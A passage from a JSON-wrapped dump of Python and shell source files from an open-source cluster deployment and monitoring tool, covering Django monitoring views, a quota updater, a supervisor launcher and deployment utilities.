storm_metrics.setdefault(storm_id, {})\n for group_name, group_metrics in topology_metrics.iteritems():\n if group_name.find(\"STORM_SYSTEM_\") == 0 or group_name == \"STORM_BUILTIN_SPOUT_METRICS\" or group_name == \"STORM_BUILTIN_BOLT_METRICS\":\n continue\n group_component_id = group_name.split(\":\")[0]\n group_task_id = group_name.split(\":\")[1]\n group_metrics_dict = topology_metrics_dict.setdefault(group_component_id, {})\n task_metrics_dict = group_metrics_dict.setdefault(group_task_id, {});\n\n for metrics_name, metrics in group_metrics.iteritems():\n task_metrics_dict[metrics_name] = metrics\n # after upper handle, storm_metrics in format: <storm_id, <component_id, <task_id, <key, value>>>>\n\n format_storm_metrics = {}\n for storm_id in storm_metrics:\n topology_metrics = storm_metrics.get(storm_id)\n format_topology_metrics = format_storm_metrics.setdefault(storm_id, {})\n for component_id in topology_metrics:\n group_metrics = topology_metrics.get(component_id)\n format_group_metrics = format_topology_metrics.setdefault(component_id, [])\n\n for task_id in group_metrics:\n metrics = group_metrics.get(task_id)\n key_set, value_set = add_key_set_for_format_group_metrics(format_group_metrics, metrics.keys())\n format_metrics_list = [task_id]\n for key in key_set:\n if key == \"TaskID\":\n continue\n format_metrics_list.append(metrics.get(key, \" \"))\n value_set.append(format_metrics_list)\n\n # after upper handle, format_storm_metrics in format:\n # <storm_id, <component_id,[<\"key_set\": [key1, key2, ...... ,keyn], \"value_sets\":\n # [[v11, v12, ...... v1n], ...... ,[vm1, vm2, ...... vmn]],> ...... <\"key_set\": [], \"value_sets\": []>] > >\n params = {\n 'cluster' : cluster,\n 'storm_metrics' : format_storm_metrics,\n }\n\n return respond(request, 'monitor/storm_user_board.html', params)\n\ndef add_key_set_for_format_group_metrics(format_group_metrics, task_key_set):\n key_set = task_key_set[:]\n key_set.sort()\n key_set.insert(0, \"TaskID\")\n\n for group_metrics in format_group_metrics:\n if cmp(key_set, group_metrics[\"key_set\"]) == 0:\n return (key_set, group_metrics[\"value_set\"])\n\n new_group_metrics = {\n \"key_set\": key_set,\n \"value_set\": [],\n }\n format_group_metrics.append(new_group_metrics)\n\n return (new_group_metrics[\"key_set\"], new_group_metrics[\"value_set\"])\n\n#url: /topology/$storm_id/?topology_id=xxx\ndef show_storm_topology(request, id):\n cluster = dbutil.get_cluster(id)\n\n storm_id = request.GET.get('topology_id')\n spout_keys = [\"__ack-count\", \"__fail-count\", \"__emit-count\", \"__transfer-count\", \"__complete-latency\",]\n bolt_keys = [\"__ack-count\", \"__fail-count\", \"__emit-count\", \"__transfer-count\", \"__process-latency\", \"__execute-count\", \"__execute-latency\",]\n\n storm_metrics = {\"storm_id\" : storm_id}\n storm_graphs = []\n for key in spout_keys:\n title = storm_id + \":Spout:\" + key\n query = (\"&m=sum:%s{host=%s,group=STORM_BUILTIN_SPOUT_METRICS}&o=\" % (key, dbutil.format_storm_name(storm_id)))\n graph = {\n \"title\" : title,\n \"query\" : query,\n }\n storm_graphs.append(graph)\n\n for key in bolt_keys:\n title = storm_id + \":Bolt:\" + key\n query = (\"&m=sum:%s{host=%s,group=STORM_BUILTIN_BOLT_METRICS}&o=\" % (key, dbutil.format_storm_name(storm_id)))\n graph = {\n \"title\" : title,\n \"query\" : query,\n }\n storm_graphs.append(graph)\n\n storm_metrics[\"graphs\"] = storm_graphs\n params = {\n 'cluster' : cluster,\n 'storm_metrics' : storm_metrics,\n }\n\n return respond(request, 'monitor/storm_topology.html', params)\n\n\ndef is_test_table(table):\n if 'tst' in table.cluster.name:\n return True\n if 'test' in table.cluster.name:\n return True\n\n if 'longhaul' in table.name:\n return True\n if 'test' in table.name:\n return True\n\n return False\n\n#url: /table\ndef show_all_tables(request):\n tables = dbutil.get_all_tables()\n tables = [table for table in tables if not is_system_table(table)]\n tables = [table for table in tables if not is_test_table(table)]\n params = {\n 'tables': tables,\n }\n return respond(request, 'monitor/hbase_tables.html', params)\n\n#url: /table/$table_id/\ndef show_table(request, id):\n table = dbutil.get_table(id)\n cluster = table.cluster\n\n read_requests_dist_by_rs, write_requests_dist_by_rs = dbutil.get_requests_distribution(table)\n params = {\n 'chart_id': 'read_requests_on_rs',\n 'chart_title': 'read requests on region',\n 'request_dist': read_requests_dist_by_rs,\n }\n\n read_requests_dist_by_rs_chart = loader.get_template('monitor/requests_dist_column_chart.tpl').render(Context(params))\n\n params = {\n 'chart_id': 'write_requests_on_rs',\n 'chart_title': 'write requests on region',\n 'request_dist': write_requests_dist_by_rs,\n }\n write_requests_dist_by_rs_chart = loader.get_template('monitor/requests_dist_column_chart.tpl').render(\n Context(params))\n\n memstore_size_dist_by_region, storefile_size_dist_by_region = dbutil.get_data_distribution(table)\n\n params = {\n 'chart_id': 'memstore_size_dist_by_region',\n 'chart_title': 'memstore size on region',\n 'request_dist': memstore_size_dist_by_region,\n }\n memstore_size_dist_by_region_chart = loader.get_template('monitor/requests_dist_column_chart.tpl').render(Context(params))\n\n params = {\n 'chart_id': 'storefile_size_dist_by_region',\n 'chart_title': 'storefile size on region',\n 'request_dist': storefile_size_dist_by_region,\n }\n storefile_size_dist_by_region_chart = loader.get_template('monitor/requests_dist_column_chart.tpl').render(Context(params))\n\n group = str(table)\n tsdb_read_query = [metric_helper.make_metric_query(cluster.name, group, 'readRequestsCountPerSec')]\n tsdb_write_query = [metric_helper.make_metric_query(cluster.name, group, 'writeRequestsCountPerSec')]\n\n params = {\n 'cluster': cluster,\n 'table': table,\n 'read_requests_dist_by_rs_chart': read_requests_dist_by_rs_chart,\n 'write_requests_dist_by_rs_chart': write_requests_dist_by_rs_chart,\n 'memstore_size_dist_by_region_chart': memstore_size_dist_by_region_chart,\n 'storefile_size_dist_by_region_chart': storefile_size_dist_by_region_chart,\n 'tsdb_read_query': tsdb_read_query,\n 'tsdb_write_query': tsdb_write_query,\n }\n\n return respond(request, 'monitor/hbase_table.html', params)\n\n#url: /table/operation/$table_id\ndef show_table_operation(request, id):\n table = dbutil.get_table(id)\n cluster = table.cluster\n endpoint = dbutil.map_cluster_to_endpoint(cluster.name)\n group = str(table)\n params = {\n 'cluster' : cluster,\n 'table' : table,\n 'tsdb_metrics' : metric_helper.make_operation_metrics(endpoint, table, group),\n 'endpoint' : endpoint\n }\n return respond(request, 'monitor/hbase_table_operation.html', params)\n\n#url: /table/count_rows\ndef show_table_count_rows(request):\n tables_to_count = Table.objects.filter(is_count_rows=True)\n tables_not_to_count = Table.objects.filter(is_count_rows=False)\n params = {\n 'count_period': settings.COUNT_PERIOD,\n 'count_start_hour': settings.COUNT_START_HOUR,\n 'count_end_hour': settings.COUNT_END_HOUR,\n 'tables_to_count': tables_to_count,\n 'tables_not_to_count': tables_not_to_count\n }\n return respond(request, 'monitor/hbase_table_count_rows.html', params)\n\n#url: /table/add_table_count_rows/$table_id\ndef add_table_count_rows(request, id):\n table = dbutil.get_table(id)\n table.is_count_rows = True\n table.save()\n return HttpResponse()\n\n#url: /table/cancel_table_count_rows/$table_id\ndef cancel_table_count_rows(request, id):\n table = dbutil.get_table(id)\n table.is_count_rows = False\n table.save()\n return HttpResponse()\n\n#url: /regionserver/operation/$rs_id\ndef show_regionserver_operation(request, id):\n regionserver = dbutil.get_regionserver(id)\n cluster = regionserver.cluster\n endpoint = dbutil.map_cluster_to_endpoint(cluster.name)\n params = {\n 'cluster' : cluster,\n 'regionserver' : regionserver,\n 'tsdb_metrics' : metric_helper.generate_operation_metric_for_regionserver(regionserver),\n 'endpoint' : endpoint\n }\n return respond(request, 'monitor/hbase_regionserver_operation.html', params)\n\n#url: /cluster/operation/$cluster_id\ndef show_cluster_operation(request, id):\n cluster = dbutil.get_cluster(id)\n endpoint = dbutil.map_cluster_to_endpoint(cluster.name)\n group = 'Cluster'\n params = {\n 'cluster' : cluster,\n 'tsdb_metrics' : metric_helper.make_operation_metrics(endpoint, cluster.hbasecluster, group),\n 'endpoint' : endpoint\n }\n\n return respond(request, 'monitor/hbase_cluster_operation.html', params)\n\n#url: /cluster/operation/tablecomparsion\ndef show_cluster_operation_table_comparison(request, id):\n cluster = dbutil.get_cluster(id)\n endpoint = dbutil.map_cluster_to_endpoint(cluster.name)\n params = {\n 'cluster' : cluster,\n 'tsdb_metrics' : metric_helper.make_operation_metrics_for_tables_in_cluster(cluster),\n 'endpoint' : endpoint\n }\n print params['tsdb_metrics']\n return respond(request, 'monitor/hbase_cluster_operation_table_comparsion.html', params)\n\n#url: /regionserver/$rs_id/\ndef show_regionserver(request, id):\n rs = dbutil.get_regionserver(id)\n cluster = rs.cluster\n\n read_requests_dist_by_rs, write_requests_dist_by_rs = dbutil.get_requests_distribution(rs);\n params = {\n 'chart_id': 'read_requests_on_rs',\n 'chart_title': 'read requests on region',\n 'request_dist': read_requests_dist_by_rs,\n }\n\n read_requests_dist_by_rs_chart = loader.get_template('monitor/requests_dist_column_chart.tpl').render(Context(params))\n\n params = {\n 'chart_id': 'write_requests_on_rs',\n 'chart_title': 'write requests on region',\n 'request_dist': write_requests_dist_by_rs,\n }\n write_requests_dist_by_rs_chart = loader.get_template('monitor/requests_dist_column_chart.tpl').render(\n Context(params))\n\n group = str(rs)\n tsdb_read_query = [metric_helper.make_metric_query(cluster.name, group, 'readRequestsCountPerSec')]\n tsdb_write_query = [metric_helper.make_metric_query(cluster.name, group, 'writeRequestsCountPerSec')]\n\n params = {\n 'cluster': cluster,\n 'regionserver': rs,\n 'read_requests_dist_by_rs_chart': read_requests_dist_by_rs_chart,\n 'write_requests_dist_by_rs_chart': write_requests_dist_by_rs_chart,\n 'tsdb_read_query': tsdb_read_query,\n 'tsdb_write_query': tsdb_write_query,\n }\n return respond(request, 'monitor/hbase_regionserver.html', params)\n\n#url: /user/$user_id\ndef show_user_quota(request, id):\n quota = dbutil.get_quota(id)\n cluster = quota.cluster\n\n used_quota_query = [metric_helper.make_quota_query(cluster.name, quota.name, 'used_quota')]\n used_space_quota_query = [metric_helper.make_quota_query(cluster.name, quota.name, 'used_space_quota')]\n\n params = {\n 'cluster': cluster,\n 'used_quota_query': used_quota_query,\n 'used_space_quota_query': used_space_quota_query,\n }\n return respond(request, 'monitor/quota_user.html', params)\n\n#url: /job/$id/\ndef show_job(request, id):\n tasks = dbutil.get_healthy_tasks_by_job(id)\n job = dbutil.get_job(id)\n\n endpoints = [metric_helper.form_perf_counter_endpoint_name(task) for task in tasks]\n tsdb_metrics = metric_helper.make_metrics_query_for_job(endpoints, job, tasks)\n print tsdb_metrics\n params = {\n 'job': job,\n 'tasks': tasks,\n 'tsdb_metrics': tsdb_metrics,\n }\n\n return respond(request, 'monitor/job.html', params)\n\n#url: /task/$id/\ndef show_task(request, id):\n task = dbutil.get_task(id)\n job = task.job\n tasks = dbutil.get_tasks_by_job(job)\n\n tsdb_metrics = metric_helper.make_metrics_query_for_task(\n metric_helper.form_perf_counter_endpoint_name(task),\n task)\n\n params = {\n 'job': job,\n 'task': task,\n 'tasks': tasks,\n 'tsdb_metrics': tsdb_metrics,\n }\n return respond(request, 'monitor/task.html', params)\n\n\ndef show_all_metrics(request):\n result = {}\n metrics = dbutil.get_all_metrics()\n if not metrics:\n return HttpResponse('', content_type='application/json; charset=utf8')\n\n result['timestamp'] = int(time.time())\n result['data'] = metrics\n # defaultly not format output\n indent = None\n if 'indent' in request.GET:\n # when indent is set, format json output with indent = 1\n indent = 1\n return HttpResponse(json.dumps(result, indent=indent),\n content_type='application/json; charset=utf8')\n\ndef show_all_metrics_config(request):\n metrics_config = metric_helper.get_all_metrics_config()\n\n # defaultly not format output\n indent = None\n if 'indent' in request.GET:\n # when indent is set, format json output with indent = 1\n indent = 1\n return HttpResponse(json.dumps(metrics_config, indent=indent),\n content_type='application/json; charset=utf8')\n\ndef get_time_range(request):\n start_time = datetime.datetime.today() + datetime.timedelta(hours=-1)\n end_time = datetime.datetime.today()\n if 'start_time' in request.COOKIES:\n start_time = datetime.datetime.strptime(request.COOKIES['start_time'], '%Y-%m-%d-%H-%M')\n\n if 'start_time' in request.GET:\n start_time = datetime.datetime.strptime(request.GET['start_time'], '%Y-%m-%d-%H-%M')\n\n if 'end_time' in request.COOKIES:\n end_time = datetime.datetime.strptime(request.COOKIES['end_time'], '%Y-%m-%d-%H-%M')\n\n if 'end_time' in request.GET:\n end_time = datetime.datetime.strptime(request.GET['end_time'], '%Y-%m-%d-%H-%M')\n return start_time, end_time\n\n\[email protected]_on_success\n@csrf_exempt\n@require_http_methods([\"POST\"])\ndef add_counter(request):\n counters = json.loads(request.body)\n remote_ip = request.META['REMOTE_ADDR']\n update_time = datetime.datetime.utcfromtimestamp(time.time()).replace(tzinfo=timezone.utc)\n for dict in counters:\n group = dict['group']\n endpoint = remote_ip\n if 'endpoint' in dict:\n endpoint = dict['endpoint']\n label = ''\n if 'label' in dict:\n label = dict['label']\n name = dict['name']\n counter, create = dbutil.get_or_create_counter(group, name)\n\n counter.host = endpoint\n counter.value = (float)(dict['value'])\n counter.unit = dict['unit']\n counter.last_update_time = update_time\n counter.label = label\n counter.save()\n return HttpResponse(\"ok\")\n\n\ndef show_all_counters(request):\n result = {}\n metrics = dbutil.get_all_counters()\n if not metrics:\n return HttpResponse('', content_type='application/json; charset=utf8')\n\n result['timestamp'] = time.time()\n result['data'] = metrics\n # defaultly not format output\n indent = None\n if 'indent' in request.GET:\n # when indent is set, format json output with indent = 1\n indent = 1\n return HttpResponse(json.dumps(result, indent=indent),\n content_type='application/json; charset=utf8')\n\n\ndef respond(request, template, params=None):\n \"\"\"Helper to render a response, passing standard stuff to the response.\n Args:\n request: The request object.\n template: The template name; '.html' is appended automatically.\n params: A dict giving the template parameters; modified in-place.\n Returns:\n Whatever render_to_response(template, params) returns.\n Raises:\n Whatever render_to_response(template, params) raises.\n \"\"\"\n params['request'] = request\n params['user'] = request.user\n params['chart_url_prefix'] = owl_config.CHART_URL_PREFIX\n params['tsdb_url_prefix'] = owl_config.TSDB_ADDR\n params['supervisor_port'] = owl_config.SUPERVISOR_PORT\n params['start_date'] = (datetime.datetime.now() - datetime.timedelta(minutes=15)).strftime('%Y/%m/%d-%H:%M:%S')\n params['quota_start_date'] = (datetime.datetime.now() - datetime.timedelta(hours=20)).strftime('%Y/%m/%d-%H:%M:%S')\n params.update(request.GET)\n response = render_to_response(template, params,\n context_instance=RequestContext(request))\n return response\n"
},
{
"alpha_fraction": 0.6132208108901978,
"alphanum_fraction": 0.6160337328910828,
"avg_line_length": 26.882352828979492,
"blob_id": "ff55738f4850c2f93d3faf61fc4c211f9f896ac4",
"content_id": "d5b9145c18668182816aa55046e9e746b26f270a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1422,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 51,
"path": "/owl/quota/management/commands/quota_updater.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import logging\nimport time\nimport utils.mail\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand, CommandError\nfrom optparse import make_option\nfrom os import path\nfrom utils.quota_util import QuotaUpdater\n\nfrom quota_reportor import QUOTA_REPORT_ADMINS\n\nlogger = logging.getLogger('quota')\n\nclass Command(BaseCommand):\n args = ''\n help = \"Run the background updater to collector quota on hdfs clusters.\"\n\n option_list = BaseCommand.option_list + (\n make_option(\n \"--period\",\n default=3600, # check per hour\n help=\"Check period\"),\n )\n\n def handle(self, *args, **options):\n self.args = args\n self.options = options\n self.mailer = utils.mail.Mailer(options)\n\n self.stdout.write(\"args: %r\\n\" % (args, ))\n self.stdout.write(\"options: %r\\n\" % options)\n\n quota_updater = QuotaUpdater()\n\n while True:\n try:\n quota_updater.update_all_cluster()\n except Exception as e:\n # send alert email when program error\n logger.warning('Quota updater error: %r', e)\n admin_email = ''\n try:\n admin_email = QUOTA_REPORT_ADMINS\n except:\n pass\n self.mailer.send_email(subject = 'Quota updater error',\n content = repr(e),\n to_email = admin_email,\n )\n time.sleep(int(self.options['period']))\n"
},
{
"alpha_fraction": 0.6851851940155029,
"alphanum_fraction": 0.6851851940155029,
"avg_line_length": 17,
"blob_id": "3c4ad1f5ee67361d6bc554ee9054e57bc5b1977b",
"content_id": "865fcd39c6a038fc3caaaefee5177fa18bde4138",
"detected_licenses": [
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 54,
"license_type": "permissive",
"max_line_length": 42,
"num_lines": 3,
"path": "/supervisor/start_supervisor.sh",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\nPYTHONPATH=. $ENV_PYTHON supervisord.py $@\n"
},
{
"alpha_fraction": 0.6942580342292786,
"alphanum_fraction": 0.7002236843109131,
"avg_line_length": 30.928571701049805,
"blob_id": "c4c29a69473079f9f8fe1332e082ad4e99bfd697",
"content_id": "090af17453b238d2eca93736c95e2112ed99dec8",
"detected_licenses": [
"HPND",
"Apache-2.0",
"BSD-3-Clause-Modification",
"ZPL-2.1",
"LicenseRef-scancode-supervisor"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1341,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 42,
"path": "/supervisor/supervisor/medusa/demo/script_server.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "# -*- Mode: Python -*-\n\nimport re, sys\nfrom supervisor.medusa import asyncore_25 as asyncore\nfrom supervisor.medusa import http_server\nfrom supervisor.medusa import default_handler\nfrom supervisor.medusa import logger\nfrom supervisor.medusa import script_handler\nfrom supervisor.medusa import filesys\n\nPUBLISHING_ROOT='/home/medusa'\nCONTENT_LENGTH = re.compile ('Content-Length: ([0-9]+)', re.IGNORECASE)\n\nclass sample_input_collector:\n def __init__ (self, request, length):\n self.request = request\n self.length = length\n\n def collect_incoming_data (self, data):\n print 'data from %s: <%s>' % (self.request, repr(data))\n\nclass post_script_handler (script_handler.script_handler):\n\n def handle_request (self, request):\n if request.command == 'post':\n cl = default_handler.get_header(CONTENT_LENGTH, request.header)\n ic = sample_input_collector(request, cl)\n request.collector = ic\n print request.header\n\n return script_handler.script_handler.handle_request (self, request)\n\nlg = logger.file_logger (sys.stdout)\nfs = filesys.os_filesystem (PUBLISHING_ROOT)\ndh = default_handler.default_handler (fs)\nph = post_script_handler (fs)\nhs = http_server.http_server ('', 8081, logger_object = lg)\n\nhs.install_handler (dh)\nhs.install_handler (ph)\n\nasyncore.loop()\n"
},
{
"alpha_fraction": 0.6695208549499512,
"alphanum_fraction": 0.6732255220413208,
"avg_line_length": 35.038021087646484,
"blob_id": "7cacd1c5dd4b8c4a1d2ccbc5ed0599874ca041c0",
"content_id": "a787db337b2a211ebdfadb25a316ea0c247424d9",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 40759,
"license_type": "permissive",
"max_line_length": 94,
"num_lines": 1131,
"path": "/client/deploy_utils.py",
"repo_name": "jkingben/minos",
"src_encoding": "UTF-8",
"text": "import argparse\nimport cStringIO\nimport deploy_config\nimport getpass\nimport hashlib\nimport os\nimport pprint\nimport re\nimport service_config\nimport socket\nimport string\nimport subprocess\nimport sys\nimport telnetlib\nimport time\nimport urllib2\nimport uuid\n\nfrom log import Log\nfrom service_config import ServiceConfig\nfrom supervisor_client import SupervisorClient\nfrom tank_client import TankClient\n\nHOST_TASK_REGEX = re.compile('(?P<host>\\d+)(\\.(?P<task>\\d+))?$')\n\nSUPERVISOR_SUCCESS = \"OK\"\n\nPARALLEL_DEPLOY_JOBS = [\"datanode\", \"regionserver\", \"nodemanager\",\n \"historyserver\", \"impalad\", \"supervisor\", \"logviewer\", \"kafka\",\n \"kafkascribe\"]\n\nSTOPPED_STATUS = [\"STOPPED\", \"BACKOFF\", \"EXITED\", \"FATAL\"]\n\nHADOOP_PROPERTY_PREFIX = \"hadoop.property.\"\nHADOOP_CONF_PATH = \"/etc/hadoop/conf\"\nLATEST_PACKAGE_INFO_URI = \"get_latest_package_info\"\nDOWNLOAD_PACKAGE_URI = \"packages\"\n\nFAKE_SVN_VERSION = \"12345\"\n\nclass Template(string.Template):\n # the orginal delimiter '$' is also commonly used by shell script, so\n # overwrite to '%' here.\n delimiter = '%'\n\n\ndef get_deploy_config():\n return deploy_config.get_deploy_config()\n\ndef get_real_instance_id(instance_id):\n return service_config.get_real_instance_id(instance_id)\n\ndef get_base_port(base_port, instance_id):\n return service_config.get_base_port(base_port, instance_id)\n\ndef get_http_service_uri(host, base_port, instance_id):\n return 'http://%s:%d' % (host,\n get_base_port(base_port, instance_id) + 1)\n\ndef get_host_id(hosts, host_ip):\n for id, host in hosts.iteritems():\n if host_ip == host.ip:\n return id\n Log.print_critical(\"Invalid host ip: %s, please check your config.\" % host_ip)\n\ndef get_task_id(hosts, host_id, instance_id):\n instance_id = 0 if (instance_id == -1) else instance_id\n task_id = 0\n for id, host in hosts.iteritems():\n if host_id == id:\n task_id += instance_id\n break\n else:\n task_id += host.instance_num\n return task_id\n\ndef get_service_log_level(args, service_config):\n if args.log_level:\n return args.log_level\n else:\n return service_config.cluster.log_level\n\ndef get_local_package_path_general(path, artifact, version):\n '''\n Get the local tarball path of the package of specified artifact and version\n\n @param path the base path of the tarball\n @param artifact the artifact of the package\n @param version the version of the package\n @return string the full path of the tarball\n\n Note: This method is for internal use, users shouldn't call it directly.\n Users who want to obtain the local package path should call\n get_local_package_path().\n '''\n return (\"%s/%s-%s.tar.gz\" % (path, artifact, version))\n\ndef get_local_package_path(artifact, version):\n '''\n Get the local tarball path of the package of specified artifact and version\n\n @param artifact the artifact of the package\n @param version the version of the package\n @return string the full path of the tarball\n '''\n if artifact == \"zookeeper\":\n package_path = get_local_package_path_general(\n get_deploy_config().get_zookeeper_package_dir(),\n artifact, version)\n elif artifact == \"hadoop\":\n package_path = get_local_package_path_general(\n get_deploy_config().get_hadoop_package_dir(),\n artifact, version)\n elif artifact == \"hbase\":\n package_path = get_local_package_path_general(\n get_deploy_config().get_hbase_package_dir(),\n artifact, version)\n elif artifact == \"impala-shell\" or artifact == \"impala\":\n package_path = get_local_package_path_general(\n get_deploy_config().get_imapala_package_dir(),\n artifact, version)\n elif artifact == \"kafka\":\n package_path = get_local_package_path_general(\n get_deploy_config().get_kafka_package_dir(),\n artifact, version)\n elif artifact == \"apache-storm\":\n package_path = get_local_package_path_general(\n get_deploy_config().get_storm_package_dir(),\n artifact, version)\n elif artifact == \"galaxy\":\n package_path = get_local_package_path_general(\n get_deploy_config().get_galaxy_package_dir(),\n artifact, version)\n elif artifact == 'chronos':\n package_path = get_local_package_path_general(\n get_deploy_config().get_chronos_package_dir(),\n artifact, version)\n else:\n Log.print_critical(\"Unknow artifact: %s\" % artifact)\n return package_path\n\ndef get_revision_number(cmd, output_prefix, work_space_dir):\n env = os.environ\n # Enforce English locale.\n env[\"LC_ALL\"] = \"C\"\n current_work_dir = os.getcwd()\n os.chdir(work_space_dir)\n content = subprocess.check_output(cmd, stderr=subprocess.STDOUT, env=env)\n os.chdir(current_work_dir)\n for line in content.splitlines():\n if line.startswith(output_prefix):\n return line[len(output_prefix):]\n\ndef generate_package_revision(root):\n '''\n Get the revision of the package. Currently, svn revision and git commit are\n supported. If the package directory is neither a svn working directory nor\n a git working directory, a fake revision will be returned.\n\n @param root the local package root directory\n @return string the revision of the package\n '''\n if os.path.islink(root):\n real_path = os.readlink(root)\n if not real_path.startswith('/'):\n abs_path = \"%s/%s\" % (os.path.dirname(root), real_path)\n else:\n abs_path = real_path\n else:\n abs_path = root\n\n try:\n try:\n cmd = [\"svn\", \"info\"]\n revision_prefix = \"Revision: \"\n return \"r%s\" % get_revision_number(cmd, revision_prefix, abs_path)\n except:\n cmd = [\"git\", \"show\"]\n commit_prefix = \"commit \"\n return get_revision_number(cmd, commit_prefix, abs_path)\n except:\n # We cannot get the version No., just return a fake one\n return \"r%s\" % FAKE_SVN_VERSION\n\ndef generate_checksum(path):\n '''\n Generate the SHA-1 digest of specified file.\n\n @param path the path of the file\n @return string the SHA-1 digest\n '''\n fd = open(path, \"r\")\n sha1 = hashlib.sha1()\n while True:\n buffer = fd.read(4096)\n if not buffer: break\n sha1.update(buffer)\n fd.close()\n return sha1.hexdigest()\n\ndef upload_package(args, artifact, version):\n '''\n Upload the specified package to the package server(Tank). Note that\n if the file with the same checksum is already uploaded, this uploading\n will be skipped.\n\n @param args the command line arguments object parsed by artparse.py\n @param artifact the artifact of the package\n @param version the version of the package\n @return dict the package information return by the package server\n '''\n package_path = get_local_package_path(artifact, version)\n Log.print_info(\"Uploading pacakge: %s\" % package_path)\n\n revision = generate_package_revision(get_root_dir(args.service))\n Log.print_success(\"Revision is: %s\" % revision)\n\n Log.print_info(\"Generating checksum of package: %s\" % package_path)\n checksum = generate_checksum(package_path)\n Log.print_success(\"Checksum is: %s\" % checksum)\n\n tank_client = get_tank_client()\n package_info = tank_client.check_package(artifact, checksum)\n\n if not package_info:\n if 200 == tank_client.upload(package_path, artifact, revision):\n Log.print_success(\"Upload package %s success\" % package_path)\n package_info = tank_client.check_package(artifact, checksum)\n return eval(package_info)\n else:\n Log.print_warning(\"Package %s has already uploaded, skip uploading\" %\n package_path)\n return eval(package_info)\n return None\n\ndef generate_site_xml(args, template_dict):\n '''\n Generate the *-site.xml file according to the given properties dict.\n\n @param args the argument object parsed by argparse\n @param template_dict the properties dict\n @return string the generated file content\n '''\n template_path = \"%s/site.xml.tmpl\" % get_template_dir()\n\n template = Template(open(template_path).read())\n config_value = \"\"\n keys = template_dict.keys()\n keys.sort()\n for key in keys:\n config_value += \"\"\"\n <property>\n <name>%s</name>\n <value>%s</value>\n </property>\n\"\"\" % (key, template_dict[key])\n return template.substitute({\"config_value\": config_value})\n\ndef generate_properties_file(args, template_dict):\n '''\n Generate the *.properties file according to the given properties dict.\n\n @param args the argument object parsed by argparse\n @param template_dict the properties dict\n @return string the generated file content\n '''\n template_path = \"%s/properties.tmpl\" % get_template_dir()\n\n template = Template(open(template_path).read())\n return template.substitute(\n {\"config_value\":\n \"\\n\".join([\"%s=%s\" % (k, v) for k, v in template_dict.iteritems()])})\n\ndef generate_yaml_file(yaml_dict):\n '''\n Generate the yaml format config file according to the given yaml dict.\n\n @param yaml_dict the yaml dict\n @return string the generated file content\n '''\n NESTING_DICT_REGEX = re.compile('\\{(?P<consumers>.+?)\\}')\n yaml_format_string = \"\"\n for key, value in yaml_dict.iteritems():\n yaml_format_string += key\n reg_expr = NESTING_DICT_REGEX.match(value)\n # the format of consumers: \n # different consumers separated by ';'\n # different key-value pairs separated by ',' within the same consumer\n # the key and value separated by ':'\n # for example: '{class:consumer_1,parallelism.hint:xx;class:consumer_2,...}'\n if reg_expr:\n consumers = reg_expr.group('consumers')\n consumer_list = consumers.split(';')\n # process consumers one by one\n for consumer in consumer_list:\n key_value_list = consumer.split(',')\n class_name = key_value_list[0].split(':')[1]\n yaml_format_string += \":\\n - class: %s\\n\" % class_name\n # process parallelism and other arguments\n for key_value_pair in key_value_list[1:]:\n key, value = key_value_pair.split(':')\n yaml_format_string += \" %s: %s\\n\" % (key, value)\n elif value.find(',') != -1:\n yaml_format_string += \":\\n\"\n for item in value.split(','):\n yaml_format_string += \" - %s\\n\" % item\n else:\n yaml_format_string += \": %s\\n\" % value\n\n return yaml_format_string\n\ndef create_run_script(template_path, template_dict):\n '''\n Generate the run script of given script template and variables dict.\n\n @param template_path the script template path\n @param template_dict the variables dict\n @return string the generated file content\n '''\n template = Template(open(template_path).read())\n content = template.safe_substitute(template_dict)\n return content\n\ndef get_template_dir():\n '''\n Get the config templates directory.\n '''\n return '%s/template' % get_deploy_config().get_config_dir()\n\ndef get_config_dir():\n '''\n Get the service config directory.\n '''\n return get_deploy_config().get_config_dir()\n\ndef get_root_dir(service):\n '''\n Get the local root directory of specified service.\n\n @param service the service name\n @return string the local root directory of the service\n '''\n if service == \"hdfs\" or service == \"yarn\" or service == \"mapreduce\":\n return get_deploy_config().get_hadoop_root()\n if service == \"hbase\":\n return get_deploy_config().get_hbase_root()\n if service == \"zookeeper\":\n return get_deploy_config().get_zookeeper_root()\n if service == \"impala\":\n return get_deploy_config().get_impala_root()\n if service == \"kafka\":\n return get_deploy_config().get_kafka_root()\n if service == \"storm\":\n return get_deploy_config().get_storm_root()\n if service == \"fds\":\n return get_deploy_config().get_galaxy_root()\n if service == \"chronos\":\n return get_deploy_config().get_chronos_root()\n Log.print_critical(\"Unknow service: %s\" % service)\n\ndef get_supervisor_client(host, service, cluster, job, instance_id=-1):\n '''\n A factory method to construct a supervisor client object.\n\n @param host the remote server's host\n @param service the service name\n @param cluster the cluster name\n @param job the job name\n @param instance_id the instance id\n @return object the supervisor client object\n '''\n return service_config.get_supervisor_client(host, service, cluster, job, instance_id)\n\ndef get_tank_client():\n '''\n A factory method to construct a tank(package server) client object.\n '''\n deploy_config = get_deploy_config()\n tank_config = deploy_config.get_tank_config()\n\n return TankClient(tank_config.get('server_host'),\n tank_config.get('server_port'))\n\ndef get_service_config(args):\n '''\n Get service config, without any dependencies.\n\n @param args the command line arguments object parsed by argparse\n '''\n service_config.get_short_user_name(args)\n if not getattr(args, args.service + \"_config\", None):\n setattr(args, args.service+\"_config\", ServiceConfig(args))\n return getattr(args, args.service+\"_config\")\n\ndef generate_service_token(service, cluster):\n '''\n Generate a token used to bootstrap and cleanup.\n\n @param service the service name\n @param cluster the cluster name\n @return string the generated token\n '''\n return str(uuid.uuid3(uuid.NAMESPACE_DNS,'%s-%s' % (\n service, cluster)))\n\ndef check_input(input, yes='y'):\n '''\n Check if the input string is yes or not.\n '''\n return input.strip().lower() == yes.lower()\n\n\ndef check_admin_priviledge(args):\n '''\n Check if the current user is in 